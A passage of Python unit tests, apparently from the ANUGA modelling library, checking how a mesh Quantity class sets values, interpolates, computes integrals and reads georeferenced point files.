#a = a[::-1,:]
nrows = z.shape[0]
ncols = z.shape[1]
ratio = float(nrows)/float(ncols)
print(ratio)
#Setup fig size to correspond to array size
fig = pylab.figure(figsize=(10, 10*ratio))
levels = numpy.arange(-7, 10, 0.1)
CF = pylab.contourf(x, y, z, levels=levels)
CB = pylab.colorbar(CF, shrink=0.8, extend='both')
#CC = pylab.contour(x,y,a, levels=[0.0,1.0,2.0,3.0])
pylab.show()
def test_get_extrema_1(self):
quantity = Quantity(self.mesh4,
[[1, 2, 3], [5, 5, 5], [0, 0, 9], [-6, 3, 3]])
assert num.allclose(quantity.centroid_values, [
2., 5., 3., 0.]) # Centroids
v = quantity.get_maximum_value()
assert v == 5
v = quantity.get_minimum_value()
assert v == 0
i = quantity.get_maximum_index()
assert i == 1
i = quantity.get_minimum_index()
assert i == 3
x, y = quantity.get_maximum_location()
xref, yref = 4.0/3, 4.0/3
assert x == xref
assert y == yref
v = quantity.get_values(interpolation_points=[[x, y]])
assert num.allclose(v, 5)
x, y = quantity.get_minimum_location()
v = quantity.get_values(interpolation_points=[[x, y]])
assert num.allclose(v, 0)
def test_get_maximum_2(self):
a = [0.0, 0.0]
b = [0.0, 2.0]
c = [2.0, 0.0]
d = [0.0, 4.0]
e = [2.0, 2.0]
f = [4.0, 0.0]
points = [a, b, c, d, e, f]
#bac, bce, ecf, dbe
vertices = [[1, 0, 2], [1, 2, 4], [4, 2, 5], [3, 1, 4]]
domain = Generic_Domain(points, vertices)
quantity = Quantity(domain)
quantity.set_values(lambda x, y: x+2*y) # 2 4 4 6
v = quantity.get_maximum_value()
assert v == 6
v = quantity.get_minimum_value()
assert v == 2
i = quantity.get_maximum_index()
assert i == 3
i = quantity.get_minimum_index()
assert i == 0
x, y = quantity.get_maximum_location()
xref, yref = 2.0/3, 8.0/3
assert x == xref
assert y == yref
v = quantity.get_values(interpolation_points=[[x, y]])
assert num.allclose(v, 6)
x, y = quantity.get_minimum_location()
v = quantity.get_values(interpolation_points=[[x, y]])
assert num.allclose(v, 2)
#Multiple locations for maximum -
#Test that the algorithm picks the first occurrence
v = quantity.get_maximum_value(indices=[0, 1, 2])
assert num.allclose(v, 4)
i = quantity.get_maximum_index(indices=[0, 1, 2])
assert i == 1
x, y = quantity.get_maximum_location(indices=[0, 1, 2])
xref, yref = 4.0/3, 4.0/3
assert x == xref
assert y == yref
v = quantity.get_values(interpolation_points=[[x, y]])
assert num.allclose(v, 4)
# More test of indices......
v = quantity.get_maximum_value(indices=[2, 3])
assert num.allclose(v, 6)
i = quantity.get_maximum_index(indices=[2, 3])
assert i == 3
x, y = quantity.get_maximum_location(indices=[2, 3])
xref, yref = 2.0/3, 8.0/3
assert x == xref
assert y == yref
v = quantity.get_values(interpolation_points=[[x, y]])
assert num.allclose(v, 6)
def test_boundary_allocation(self):
quantity = Quantity(self.mesh4,
[[1, 2, 3], [5, 5, 5], [0, 0, 9], [-6, 3, 3]])
assert quantity.boundary_values.shape[0] == len(self.mesh4.boundary)
def test_set_values(self):
quantity = Quantity(self.mesh4)
# get reference to data arrays
centroid_values = quantity.centroid_values
vertex_values = quantity.vertex_values
quantity.set_values([[1, 2, 3], [5, 5, 5], [0, 0, 9], [-6, 3, 3]],
location='vertices')
assert num.allclose(quantity.vertex_values,
[[1, 2, 3], [5, 5, 5], [0, 0, 9], [-6, 3, 3]])
assert id(vertex_values) == id(quantity.vertex_values)
assert num.allclose(quantity.centroid_values, [
2., 5., 3., 0.]) # Centroid
assert num.allclose(quantity.edge_values, [[2.5, 2.0, 1.5],
[5., 5., 5.],
[4.5, 4.5, 0.],
[3.0, -1.5, -1.5]])
# Test default
quantity.set_values([[1, 2, 3], [5, 5, 5], [0, 0, 9], [-6, 3, 3]])
assert num.allclose(quantity.vertex_values,
[[1, 2, 3], [5, 5, 5], [0, 0, 9], [-6, 3, 3]])
assert num.allclose(quantity.centroid_values, [
2., 5., 3., 0.]) # Centroid
assert num.allclose(quantity.edge_values, [[2.5, 2.0, 1.5],
[5., 5., 5.],
[4.5, 4.5, 0.],
[3.0, -1.5, -1.5]])
# Test centroids
quantity.set_values([1, 2, 3, 4], location='centroids')
assert num.allclose(quantity.centroid_values, [
1., 2., 3., 4.]) # Centroid
# Test exceptions
try:
quantity.set_values([[1, 2, 3], [5, 5, 5], [0, 0, 9], [-6, 3, 3]],
location='bas kamel tuba')
except:
pass
try:
quantity.set_values([[1, 2, 3], [0, 0, 9]])
except ValueError:
pass
except:
raise Exception('should have raised ValueError')
def test_set_values_const(self):
quantity = Quantity(self.mesh4)
quantity.set_values(1.0, location='vertices')
assert num.allclose(quantity.vertex_values,
[[1, 1, 1], [1, 1, 1], [1, 1, 1], [1, 1, 1]])
assert num.allclose(quantity.centroid_values, [1, 1, 1, 1]) # Centroid
assert num.allclose(quantity.edge_values, [[1, 1, 1],
[1, 1, 1],
[1, 1, 1],
[1, 1, 1]])
quantity.set_values(2.0, location='centroids')
assert num.allclose(quantity.centroid_values, [2, 2, 2, 2])
def test_set_values_func(self):
quantity = Quantity(self.mesh4)
def f(x, y):
return x+y
quantity.set_values(f, location='vertices')
#print "quantity.vertex_values",quantity.vertex_values
assert num.allclose(quantity.vertex_values,
[[2, 0, 2], [2, 2, 4], [4, 2, 4], [4, 2, 4]])
assert num.allclose(quantity.centroid_values,
[4.0/3, 8.0/3, 10.0/3, 10.0/3])
assert num.allclose(quantity.edge_values,
[[1, 2, 1], [3, 3, 2], [3, 4, 3], [3, 4, 3]])
quantity.set_values(f, location='centroids')
assert num.allclose(quantity.centroid_values,
[4.0/3, 8.0/3, 10.0/3, 10.0/3])
def test_integral(self):
quantity = Quantity(self.mesh4)
# Try constants first
const = 5
quantity.set_values(const, location='vertices')
#print 'Q', quantity.get_integral()
assert num.allclose(quantity.get_integral(),
self.mesh4.get_area() * const)
# Try with a linear function
def f(x, y):
return x+y
quantity.set_values(f, location='vertices')
ref_integral = (4.0/3 + 8.0/3 + 10.0/3 + 10.0/3) * 2
assert num.allclose(quantity.get_integral(), ref_integral)
def test_integral_with_region(self):
quantity = Quantity(self.mesh4)
# Try constants first
const = 5
quantity.set_values(const, location='vertices')
#print 'Q', quantity.get_integral()
assert num.allclose(quantity.get_integral(),
self.mesh4.get_area() * const)
# Try with a linear function
def f(x, y):
return x+y
quantity.set_values(f, location='vertices')
from anuga import Region
reg1 = Region(self.mesh4, indices=[2])
ref_integral = (10.0/3) * 2
assert num.allclose(quantity.get_integral(region=reg1), ref_integral)
reg2 = Region(self.mesh4, indices=[2, 3])
ref_integral = (10.0/3 + 10.0/3) * 2
assert num.allclose(quantity.get_integral(region=reg2), ref_integral)
id = [2, 3]
ref_integral = (10.0/3 + 10.0/3) * 2
assert num.allclose(quantity.get_integral(indices=id), ref_integral)
def test_set_vertex_values(self):
quantity = Quantity(self.mesh4)
quantity.set_vertex_values([0, 1, 2, 3, 4, 5])
assert num.allclose(quantity.vertex_values,
[[1, 0, 2], [1, 2, 4], [4, 2, 5], [3, 1, 4]])
assert num.allclose(quantity.centroid_values,
[1., 7./3, 11./3, 8./3]) # Centroid
assert num.allclose(quantity.edge_values, [[1., 1.5, 0.5],
[3., 2.5, 1.5],
[3.5, 4.5, 3.],
[2.5, 3.5, 2]])
def test_set_vertex_values_subset(self):
quantity = Quantity(self.mesh4)
quantity.set_vertex_values([0, 1, 2, 3, 4, 5])
quantity.set_vertex_values([0, 20, 30, 50], indices=[0, 2, 3, 5])
assert num.allclose(quantity.vertex_values,
[[1, 0, 20], [1, 20, 4], [4, 20, 50], [30, 1, 4]])
def test_set_vertex_values_using_general_interface(self):
quantity = Quantity(self.mesh4)
quantity.set_values([0, 1, 2, 3, 4, 5])
assert num.allclose(quantity.vertex_values,
[[1, 0, 2], [1, 2, 4], [4, 2, 5], [3, 1, 4]])
#Centroid
assert num.allclose(quantity.centroid_values, [1., 7./3, 11./3, 8./3])
assert num.allclose(quantity.edge_values, [[1., 1.5, 0.5],
[3., 2.5, 1.5],
[3.5, 4.5, 3.],
[2.5, 3.5, 2]])
def test_set_vertex_values_using_general_interface_with_subset(self):
"""test_set_vertex_values_using_general_interface_with_subset(self):
Test that indices and polygon work (for constant values)
"""
quantity = Quantity(self.mesh4)
quantity.set_values([0, 2, 3, 5], indices=[0, 2, 3, 5])
assert num.allclose(quantity.vertex_values,
[[0, 0, 2], [0, 2, 0], [0, 2, 5], [3, 0, 0]])
# Constant
quantity.set_values(0.0)
quantity.set_values(3.14, indices=[0, 2], location='vertices')
# Indices refer to triangle numbers
assert num.allclose(quantity.vertex_values,
[[3.14, 3.14, 3.14], [0, 0, 0],
[3.14, 3.14, 3.14], [0, 0, 0]])
# Now try with polygon (pick points where y>2)
polygon = [[0, 2.1], [4, 2.1], [4, 7], [0, 7]]
quantity.set_values(0.0)
quantity.set_values(3.14, polygon=polygon)
assert num.allclose(quantity.vertex_values,
[[0, 0, 0], [0, 0, 0], [0, 0, 0],
[3.14, 3.14, 3.14]])
# Another polygon (pick triangles 1 and 2 (rightmost triangles))
# using centroids
polygon = [[2.1, 0.0], [3.5, 0.1], [2, 2.2], [0.2, 2]]
quantity.set_values(0.0)
quantity.set_values(3.14, location='centroids', polygon=polygon)
assert num.allclose(quantity.vertex_values,
[[0, 0, 0],
[3.14, 3.14, 3.14],
[3.14, 3.14, 3.14],
[0, 0, 0]])
# Same polygon now use vertices (default)
polygon = [[2.1, 0.0], [3.5, 0.1], [2, 2.2], [0.2, 2]]
quantity.set_values(0.0)
#print 'Here 2'
quantity.set_values(3.14, polygon=polygon)
assert num.allclose(quantity.vertex_values,
[[0, 0, 0],
[3.14, 3.14, 3.14],
[3.14, 3.14, 3.14],
[0, 0, 0]])
# Test input checking
try:
quantity.set_values(3.14, polygon=polygon, indices=[0, 2])
except:
pass
else:
msg = 'Should have caught this'
raise Exception(msg)
def test_set_vertex_values_using_general_interface_subset_and_geo(self):
"""test_set_vertex_values_using_general_interface_with_subset(self):
Test that indices and polygon work using georeferencing
"""
quantity = Quantity(self.mesh4)
G = Geo_reference(56, 10, 100)
quantity.domain.set_georeference(G)
# Constant
quantity.set_values(0.0)
quantity.set_values(3.14, indices=[0, 2], location='vertices')
# Indices refer to triangle numbers here - not vertices (why?)
assert num.allclose(quantity.vertex_values,
[[3.14, 3.14, 3.14], [0, 0, 0],
[3.14, 3.14, 3.14], [0, 0, 0]])
# Now try with polygon (pick points where y>2)
polygon = num.array([[0, 2.1], [4, 2.1], [4, 7], [0, 7]])
polygon += [G.xllcorner, G.yllcorner]
quantity.set_values(0.0)
quantity.set_values(3.14, polygon=polygon, location='centroids')
assert num.allclose(quantity.vertex_values,
[[0, 0, 0], [0, 0, 0], [0, 0, 0],
[3.14, 3.14, 3.14]])
# Another polygon (pick triangles 1 and 2 (rightmost triangles))
polygon = num.array([[2.1, 0.0], [3.5, 0.1], [2, 2.2], [0.2, 2]])
polygon += [G.xllcorner, G.yllcorner]
quantity.set_values(0.0)
quantity.set_values(3.14, polygon=polygon)
msg = ('quantity.vertex_values=\n%s\nshould be close to\n'
'[[0,0,0],\n'
' [3.14,3.14,3.14],\n'
' [3.14,3.14,3.14],\n'
' [0,0,0]]' % str(quantity.vertex_values))
assert num.allclose(quantity.vertex_values,
[[0, 0, 0],
[3.14, 3.14, 3.14],
[3.14, 3.14, 3.14],
[0, 0, 0]]), msg
def test_set_values_using_fit(self):
quantity = Quantity(self.mesh4)
#Get (enough) datapoints
data_points = [[0.66666667, 0.66666667],
[1.33333333, 1.33333333],
[2.66666667, 0.66666667],
[0.66666667, 2.66666667],
[0.0, 1.0],
[0.0, 3.0],
[1.0, 0.0],
[1.0, 1.0],
[1.0, 2.0],
[1.0, 3.0],
[2.0, 1.0],
[3.0, 0.0],
[3.0, 1.0]]
z = linear_function(data_points)
#Use built-in fit_interpolate.fit
quantity.set_values(Geospatial_data(data_points, z), alpha=0)
#quantity.set_values(points = data_points, values = z, alpha = 0)
answer = linear_function(quantity.domain.get_vertex_coordinates())
#print quantity.vertex_values, answer
assert num.allclose(quantity.vertex_values.flat, answer)
#Now try by setting the same values directly
vertex_attributes = fit_to_mesh(data_points,
quantity.domain.get_nodes(),
quantity.domain.get_triangles(),
point_attributes=z,
alpha=0,
verbose=False)
#print vertex_attributes
quantity.set_values(vertex_attributes)
assert num.allclose(quantity.vertex_values.flat, answer)
def test_set_values_using_fit_w_geo(self):
#Mesh
vertex_coordinates = [[0.76, 0.76],
[0.76, 5.76],
[5.76, 0.76]]
triangles = [[0, 2, 1]]
mesh_georef = Geo_reference(56, -0.76, -0.76)
mesh1 = Generic_Domain(vertex_coordinates, triangles,
geo_reference=mesh_georef)
mesh1.check_integrity()
#Quantity
quantity = Quantity(mesh1)
#Data
data_points = [[201.0, 401.0],
[201.0, 403.0],
[203.0, 401.0]]
z = [2, 4, 4]
data_georef = Geo_reference(56, -200, -400)
#Reference
ref = fit_to_mesh(data_points, vertex_coordinates, triangles,
point_attributes=z,
data_origin=data_georef.get_origin(),
mesh_origin=mesh_georef.get_origin(),
alpha=0)
assert num.allclose(ref, [0, 5, 5])
#Test set_values
quantity.set_values(Geospatial_data(
data_points, z, data_georef), alpha=0)
#quantity.set_values(points = data_points,
# values = z,
# data_georef = data_georef,
# alpha = 0)
#quantity.set_values(points = data_points,
# values = z,
# data_georef = data_georef,
# alpha = 0)
assert num.allclose(quantity.vertex_values.flat, ref)
#Test set_values using geospatial data object
quantity.vertex_values[:] = 0.0
geo = Geospatial_data(data_points, z, data_georef)
quantity.set_values(geospatial_data=geo, alpha=0)
assert num.allclose(quantity.vertex_values.flat, ref)
def test_set_values_from_file1(self):
quantity = Quantity(self.mesh4)
#Get (enough) datapoints
data_points = [[0.66666667, 0.66666667],
[1.33333333, 1.33333333],
[2.66666667, 0.66666667],
[0.66666667, 2.66666667],
[0.0, 1.0],
[0.0, 3.0],
[1.0, 0.0],
[1.0, 1.0],
[1.0, 2.0],
[1.0, 3.0],
[2.0, 1.0],
[3.0, 0.0],
[3.0, 1.0]]
data_geo_spatial = Geospatial_data(data_points,
geo_reference=Geo_reference(56, 0, 0))
data_points_absolute = data_geo_spatial.get_data_points(absolute=True)
attributes = linear_function(data_points_absolute)
att = 'spam_and_eggs'
#Create .txt file
ptsfile = tempfile.mktemp(".txt")
file = open(ptsfile, "w")
file.write(" x,y," + att + " \n")
for data_point, attribute in zip(data_points_absolute, attributes):
row = str(data_point[0]) + ',' + str(data_point[1]) \
+ ',' + str(attribute)
file.write(row + "\n")
file.close()
#Check that values can be set from file
quantity.set_values(filename=ptsfile,
attribute_name=att, alpha=0)
answer = linear_function(quantity.domain.get_vertex_coordinates())
#print quantity.vertex_values.flat
#print answer
assert num.allclose(quantity.vertex_values.flat, answer)
#Check that values can be set from file using default attribute
quantity.set_values(filename=ptsfile, alpha=0)
assert num.allclose(quantity.vertex_values.flat, answer)
#Cleanup
import os
os.remove(ptsfile)
def Xtest_set_values_from_file_using_polygon(self):
"""test_set_values_from_file_using_polygon(self):
Test that polygon restriction works for general points data
"""
quantity = Quantity(self.mesh4)
#Get (enough) datapoints
data_points = [[0.66666667, 0.66666667],
[1.33333333, 1.33333333],
[2.66666667, 0.66666667],
[0.66666667, 2.66666667],
[0.0, 1.0],
[0.0, 3.0],
[1.0, 0.0],
[1.0, 1.0],
[1.0, 2.0],
[1.0, 3.0],
[2.0, 1.0],
[3.0, 0.0],
[3.0, 1.0]]
data_geo_spatial = Geospatial_data(data_points,
geo_reference=Geo_reference(56, 0, 0))
data_points_absolute = data_geo_spatial.get_data_points(absolute=True)
attributes = linear_function(data_points_absolute)
att = 'spam_and_eggs'
#Create .txt file
ptsfile = tempfile.mktemp(".txt")
file = open(ptsfile, "w")
file.write(" x,y," + att + " \n")
for data_point, attribute in zip(data_points_absolute, attributes):
row = str(data_point[0]) + ',' + str(data_point[1]) \
+ ',' + str(attribute)
file.write(row + "\n")
file.close()
# Create restricting polygon (containing node #4 (2,2) and
# centroid of triangle #1 (bce))
polygon = [[1.0, 1.0], [4.0, 1.0],
[4.0, 4.0], [1.0, 4.0]]
#print self.mesh4.nodes
#print inside_polygon(self.mesh4.nodes, polygon)
assert num.allclose(inside_polygon(self.mesh4.nodes, polygon), 4)
#print quantity.domain.get_vertex_coordinates()
#print quantity.domain.get_nodes()
# Check that values can be set from file
quantity.set_values(filename=ptsfile,
polygon=polygon,
location='unique vertices',
alpha=0)
# Get indices for vertex coordinates in polygon
indices = inside_polygon(quantity.domain.get_vertex_coordinates(),
polygon)
points = num.take(quantity.domain.get_vertex_coordinates(), indices)
answer = linear_function(points)
#print quantity.vertex_values.flat
#print answer
# Check vertices in polygon have been set
assert num.allclose(num.take(quantity.vertex_values.flat, indices),
answer)
# Check vertices outside polygon are zero
indices = outside_polygon(quantity.domain.get_vertex_coordinates(),
polygon)
assert num.allclose(num.take(quantity.vertex_values.flat, indices),
0.0)
#Cleanup
import os
os.remove(ptsfile)
def test_cache_test_set_values_from_file(self):
# FIXME (Ole): What is this about?
# I don't think it checks anything new
quantity = Quantity(self.mesh4)
#Get (enough) datapoints
data_points = [[0.66666667, 0.66666667],
[1.33333333, 1.33333333],
[2.66666667, 0.66666667],
[0.66666667, 2.66666667],
[0.0, 1.0],
[0.0, 3.0],
[1.0, 0.0],
[1.0, 1.0],
[1.0, 2.0],
[1.0, 3.0],
[2.0, 1.0],
[3.0, 0.0],
[3.0, 1.0]]
georef = Geo_reference(56, 0, 0)
data_geo_spatial = Geospatial_data(data_points,
geo_reference=georef)
data_points_absolute = data_geo_spatial.get_data_points(absolute=True)
attributes = linear_function(data_points_absolute)
att = 'spam_and_eggs'
# Create .txt file
ptsfile = tempfile.mktemp(".txt")
file = open(ptsfile, "w")
file.write(" x,y," + att + " \n")
for data_point, attribute in zip(data_points_absolute, attributes):
row = str(data_point[0]) + ',' + str(data_point[1]) \
+ ',' + str(attribute)
file.write(row + "\n")
file.close()
# Check that values can be set from file
quantity.set_values(filename=ptsfile,
attribute_name=att,
alpha=0,
use_cache=True,
verbose=False)
answer = linear_function(quantity.domain.get_vertex_coordinates())
assert num.allclose(quantity.vertex_values.flat, answer)
# Check that values can be set from file using default attribute
quantity.set_values(filename=ptsfile,
alpha=0)
assert num.allclose(quantity.vertex_values.flat, answer)
# Check cache
quantity.set_values(filename=ptsfile,
attribute_name=att,
alpha=0,
use_cache=True,
verbose=False)
#Cleanup
import os
os.remove(ptsfile)
def test_set_values_from_lat_long(self):
quantity = Quantity(self.mesh_onslow)
#Get (enough) datapoints
data_points = [[-21.5, 114.5], [-21.4, 114.6], [-21.45, 114.65],
[-21.35, 114.65], [-21.45, 114.55], [-21.45, 114.6]]
data_geo_spatial = Geospatial_data(data_points,
points_are_lats_longs=True)
points_UTM = data_geo_spatial.get_data_points(absolute=True)
attributes = linear_function(points_UTM)
att = 'elevation'
#Create .txt file
txt_file = tempfile.mktemp(".txt")
file = open(txt_file, "w")
file.write(" lat,long," + att + " \n")
for data_point, attribute in zip(data_points, attributes):
row = str(data_point[0]) + ',' + str(data_point[1]) \
+ ',' + str(attribute)
#print "row", row
file.write(row + "\n")
file.close()
#Check that values can be set from file
quantity.set_values(filename=txt_file,
attribute_name=att,
alpha=0)
answer = linear_function(quantity.domain.get_vertex_coordinates())
#print "quantity.vertex_values.flat", quantity.vertex_values.flat
#print "answer",answer
assert num.allclose(quantity.vertex_values.flat, answer)
#Check that values can be set from file using default attribute
quantity.set_values(filename=txt_file, alpha=0)
assert num.allclose(quantity.vertex_values.flat, answer)
#Cleanup
import os
os.remove(txt_file)
def test_set_values_from_lat_long_2(self):
quantity = Quantity(self.mesh_onslow)
#Get (enough) datapoints
data_points = [[-21.5, 114.5], [-21.4, 114.6], [-21.45, 114.65],
[-21.35, 114.65], [-21.45, 114.55], [-21.45, 114.6]]
data_geo_spatial = Geospatial_data(data_points,
points_are_lats_longs=True)
points_UTM = data_geo_spatial.get_data_points(absolute=True)
attributes = linear_function(points_UTM)
att = 'elevation'
#Create .txt file
txt_file = tempfile.mktemp(".txt")
file = open(txt_file, "w")
file.write(" lat,long," + att + " \n")
for data_point, attribute in zip(data_points, attributes):
row = str(data_point[0]) + ',' + str(data_point[1]) \
+ ',' + str(attribute)
#print "row", row
file.write(row + "\n")
file.close()
#Check that values can be set from file
quantity.set_values(filename=txt_file,
attribute_name=att, alpha=0)
answer = linear_function(quantity.domain.get_vertex_coordinates())
#print "quantity.vertex_values.flat", quantity.vertex_values.flat
#print "answer",answer
assert num.allclose(quantity.vertex_values.flat, answer)
#Check that values can be set from file using default attribute
quantity.set_values(filename=txt_file, alpha=0)
assert num.allclose(quantity.vertex_values.flat, answer)
#Cleanup
import os
os.remove(txt_file)
def test_set_values_from_UTM_pts(self):
quantity = Quantity(self.mesh_onslow)
#Get (enough) datapoints
data_points = [[-21.5, 114.5], [-21.4, 114.6], [-21.45, 114.65],
[-21.35, 114.65], [-21.45, 114.55], [-21.45, 114.6]]
data_geo_spatial = Geospatial_data(data_points,
points_are_lats_longs=True)
points_UTM = data_geo_spatial.get_data_points(absolute=True)
attributes = linear_function(points_UTM)
att = 'elevation'
#Create .txt file
txt_file = tempfile.mktemp(".txt")
file = open(txt_file, "w")
file.write(" x,y," + att + " \n")
for data_point, attribute in zip(points_UTM, attributes):
row = str(data_point[0]) + ',' + str(data_point[1]) \
+ ',' + str(attribute)
#print "row", row
file.write(row + "\n")
file.close()
pts_file = tempfile.mktemp(".pts")
convert = Geospatial_data(txt_file)
convert.export_points_file(pts_file)
#Check that values can be set from file
quantity.set_values_from_file(pts_file, att, 0,
'vertices', None)
answer = linear_function(quantity.domain.get_vertex_coordinates())
#print "quantity.vertex_values.flat", quantity.vertex_values.flat
#print "answer",answer
assert num.allclose(quantity.vertex_values.flat, answer)
#Check that values can be set from file
quantity.set_values(filename=pts_file,
attribute_name=att, alpha=0)
answer = linear_function(quantity.domain.get_vertex_coordinates())
#print "quantity.vertex_values.flat", quantity.vertex_values.flat
#print "answer",answer
assert num.allclose(quantity.vertex_values.flat, answer)
#Check that values can be set from file using default attribute
quantity.set_values(filename=txt_file, alpha=0)
assert num.allclose(quantity.vertex_values.flat, answer)
#Cleanup
import os
os.remove(txt_file)
os.remove(pts_file)
def test_set_values_from_UTM_pts_verbose(self):
quantity = Quantity(self.mesh_onslow)
#Get (enough) datapoints
data_points = [[-21.5, 114.5], [-21.4, 114.6], [-21.45, 114.65],
[-21.35, 114.65], [-21.45, 114.55], [-21.45, 114.6],
[-21.5, 114.5], [-21.4, 114.6], [-21.45, 114.65],
[-21.35, 114.65], [-21.45, 114.55], [-21.45, 114.6],
[-21.5, 114.5], [-21.4, 114.6], [-21.45, 114.65],
[-21.35, 114.65], [-21.45, 114.55], [-21.45, 114.6],
[-21.5, 114.5], [-21.4, 114.6], [-21.45, 114.65],
[-21.35, 114.65], [-21.45, 114.55], [-21.45, 114.6],
[-21.5, 114.5], [-21.4, 114.6], [-21.45, 114.65],
[-21.35, 114.65], [-21.45, 114.55], [-21.45, 114.6],
[-21.5, 114.5], [-21.4, 114.6], [-21.45, 114.65],
[-21.35, 114.65], [-21.45, 114.55], [-21.45, 114.6],
[-21.5, 114.5], [-21.4, 114.6], [-21.45, 114.65],
[-21.35, 114.65], [-21.45, 114.55], [-21.45, 114.6],
[-21.35, 114.65], [-21.45, 114.55], [-21.45, 114.6],
[-21.5, 114.5], [-21.4, 114.6], [-21.45, 114.65],
[-21.35, 114.65], [-21.45, 114.55], [-21.45, 114.6],
[-21.5, 114.5], [-21.4, 114.6], [-21.45, 114.65],
[-21.35, 114.65], [-21.45, 114.55], [-21.45, 114.6],
[-21.5, 114.5], [-21.4, 114.6], [-21.45, 114.65],
[-21.35, 114.65], [-21.45, 114.55], [-21.45, 114.6],
[-21.5, 114.5], [-21.4, 114.6], [-21.45, 114.65],
[-21.35, 114.65], [-21.45, 114.55], [-21.45, 114.6],
[-21.5, 114.5], [-21.4, 114.6], [-21.45, 114.65],
[-21.35, 114.65], [-21.45, 114.55], [-21.45, 114.6],
[-21.5, 114.5], [-21.4, 114.6], [-21.45, 114.65],
[-21.35, 114.65], [-21.45, 114.55], [-21.45, 114.6],
]
data_geo_spatial = Geospatial_data(data_points,
points_are_lats_longs=True)
points_UTM = data_geo_spatial.get_data_points(absolute=True)
attributes = linear_function(points_UTM)
att = 'elevation'
#Create .txt file
txt_file = tempfile.mktemp(".txt")
file = open(txt_file, "w")
file.write(" x,y," + att + " \n")
for data_point, attribute in zip(points_UTM, attributes):
row = str(data_point[0]) + ',' + str(data_point[1]) \
+ ',' + str(attribute)
#print "row", row
file.write(row + "\n")
file.close()
pts_file = tempfile.mktemp(".pts")
convert = Geospatial_data(txt_file)
convert.export_points_file(pts_file)
#Check that values can be set from file
quantity.set_values_from_file(pts_file, att, 0,
'vertices', None, verbose=False,
max_read_lines=2)
answer = linear_function(quantity.domain.get_vertex_coordinates())
#print "quantity.vertex_values.flat", quantity.vertex_values.flat
#print "answer",answer
assert num.allclose(quantity.vertex_values.flat, answer)
#Check that values can be set from file
quantity.set_values(filename=pts_file,
attribute_name=att, alpha=0)
answer = linear_function(quantity.domain.get_vertex_coordinates())
#print "quantity.vertex_values.flat", quantity.vertex_values.flat
#print "answer",answer
assert num.allclose(quantity.vertex_values.flat, answer)
#Check that values can be set from file using default attribute
quantity.set_values(filename=txt_file, alpha=0)
assert num.allclose(quantity.vertex_values.flat, answer)
#Cleanup
import os
os.remove(txt_file)
os.remove(pts_file)
def test_set_values_from_file_with_georef1(self):
#Mesh in zone 56 (absolute coords)
x0 = 314036.58727982
y0 = 6224951.2960092
a = [x0+0.0, y0+0.0]
b = [x0+0.0, y0+2.0]
c = [x0+2.0, y0+0.0]
d = [x0+0.0, y0+4.0]
e = [x0+2.0, y0+2.0]
f = [x0+4.0, y0+0.0]
points = [a, b, c, d, e, f]
#bac, bce, ecf, dbe
elements = [[1, 0, 2], [1, 2, 4], [4, 2, 5], [3, 1, 4]]
#absolute going in ..
mesh4 = Generic_Domain(points, elements,
geo_reference=Geo_reference(56, 0, 0))
mesh4.check_integrity()
quantity = Quantity(mesh4)
#Get (enough) datapoints (relative to georef)
data_points_rel = [[0.66666667, 0.66666667],
[1.33333333, 1.33333333],
[2.66666667, 0.66666667],
[0.66666667, 2.66666667],
[0.0, 1.0],
[0.0, 3.0],
[1.0, 0.0],
[1.0, 1.0],
[1.0, 2.0],
[1.0, 3.0],
[2.0, 1.0],
[3.0, 0.0],
[3.0, 1.0]]
data_geo_spatial = Geospatial_data(data_points_rel,
geo_reference=Geo_reference(56, x0, y0))
data_points_absolute = data_geo_spatial.get_data_points(absolute=True)
attributes = linear_function(data_points_absolute)
att = 'spam_and_eggs'
#Create .txt file
ptsfile = tempfile.mktemp(".txt")
file = open(ptsfile, "w")
file.write(" x,y," + att + " \n")
for data_point, attribute in zip(data_points_absolute, attributes):
row = str(data_point[0]) + ',' + str(data_point[1]) \
+ ',' + str(attribute)
file.write(row + "\n")
file.close()
#file = open(ptsfile, 'r')
#lines = file.readlines()
#file.close()
#Check that values can be set from file
quantity.set_values(filename=ptsfile,
attribute_name=att, alpha=0)
answer = linear_function(quantity.domain.get_vertex_coordinates())
assert num.allclose(quantity.vertex_values.flat, answer)
#Check that values can be set from file using default attribute
quantity.set_values(filename=ptsfile, alpha=0)
assert num.allclose(quantity.vertex_values.flat, answer)
#Cleanup
import os
os.remove(ptsfile)
def test_set_values_from_file_with_georef2(self):
#Mesh in zone 56 (relative coords)
x0 = 314036.58727982
y0 = 6224951.2960092
#x0 = 0.0
#y0 = 0.0
a = [0.0, 0.0]
b = [0.0, 2.0]
c = [2.0, 0.0]
d = [0.0, 4.0]
e = [2.0, 2.0]
f = [4.0, 0.0]
points = [a, b, c, d, e, f]
#bac, bce, ecf, dbe
elements = [[1, 0, 2], [1, 2, 4], [4, 2, 5], [3, 1, 4]]
mesh4 = Generic_Domain(points, elements,
geo_reference=Geo_reference(56, x0, y0))
mesh4.check_integrity()
quantity = Quantity(mesh4)
#Get (enough) datapoints
data_points = [[x0+0.66666667, y0+0.66666667],
[x0+1.33333333, y0+1.33333333],
[x0+2.66666667, y0+0.66666667],
[x0+0.66666667, y0+2.66666667],
[x0+0.0, y0+1.0],
[x0+0.0, y0+3.0],
[x0+1.0, y0+0.0],
[x0+1.0, y0+1.0],
[x0+1.0, y0+2.0],
[x0+1.0, y0+3.0],
[x0+2.0, y0+1.0],
[x0+3.0, y0+0.0],
[x0+3.0, y0+1.0]]
data_geo_spatial = Geospatial_data(data_points,
geo_reference=Geo_reference(56, 0, 0))
data_points_absolute = data_geo_spatial.get_data_points(absolute=True)
attributes = linear_function(data_points_absolute)
att = 'spam_and_eggs'
#Create .txt file
ptsfile = tempfile.mktemp(".txt")
file = open(ptsfile, "w")
file.write(" x,y," + att + " \n")
for data_point, attribute in zip(data_points_absolute, attributes):
row = str(data_point[0]) + ',' + str(data_point[1]) \
+ ',' + str(attribute)
file.write(row + "\n")
file.close()
#Check that values can be set from file
quantity.set_values(filename=ptsfile,
attribute_name=att, alpha=0)
answer = linear_function(quantity.domain.
get_vertex_coordinates(absolute=True))
assert num.allclose(quantity.vertex_values.flat, answer)
#Check that values can be set from file using default attribute
quantity.set_values(filename=ptsfile, alpha=0)
assert num.allclose(quantity.vertex_values.flat, answer)
#Cleanup
import os
os.remove(ptsfile)
def test_set_values_from_utm_grid_file(self):
x0 = 0.0
y0 = 0.0
a = [0.0, 0.0]
b = [0.0, 2.0]
c = [2.0, 0.0]
d = [0.0, 4.0]
e = [2.0, 2.0]
f = [4.0, 0.0]
points = [a, b, c, d, e, f]
#bac, bce, ecf, dbe
elements = [[1, 0, 2], [1, 2, 4], [4, 2, 5], [3, 1, 4]]
